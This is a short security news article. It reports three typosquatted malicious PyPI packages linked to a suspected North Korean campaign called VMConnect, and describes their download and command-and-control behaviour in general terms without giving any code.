North Korean Hackers Hide Three Malicious Packages in PyPI Repository

Three new malicious Python packages have been discovered in the popular PyPI repository. According to experts, they are part of the VMConnect campaign, which was probably organized by North Korean hackers.

The packages, published under the names tablediter, request-plus and requestspro, were identified by the cybersecurity organization ReversingLabs.

The VMConnect campaign uses Python libraries to mimic popular open source tools. Once installed, they automatically download additional malware.

Attackers use the typosquatting technique to make malicious extensions look legitimate. To do this, names are used that are very similar to the names of popular libraries, which can confuse developers and avoid detection.

One of the packages, tablediter, does not activate its malicious code immediately after installation to evade security systems.

The program inside the tablediter runs in an infinite loop. It regularly communicates with an external server to download and activate Base64 encrypted code. Now the exact nature of the code remains unknown, adding an additional degree of uncertainty and risk for specialists.

Two other packages, request-plus and requestspro, collect information about the infected computer and transmit it to the management server.

After establishing a connection to the C&C server, the infected system receives a specialized token. It is sent back, but to a different address on the same server. In response, you will receive a coded Python module and a download link.

The researchers suggest that through this link, the module triggers the download of the next phase of the malware.

The current attack scenarios and other known incidents, such as JumpCloud attacks and npm campaigns, are suspiciously similar. This fact reinforces the version of the intervention of North Korean hackers. Interestingly, in other operations, the attackers pursued financial gains and mainly attacked cryptocurrency platforms.

Similar attacks were found on macOS and Linux operating systems. This is just the latest example in a series of attacks against users of the PyPI repository, underscoring that security experts need to be on their guard.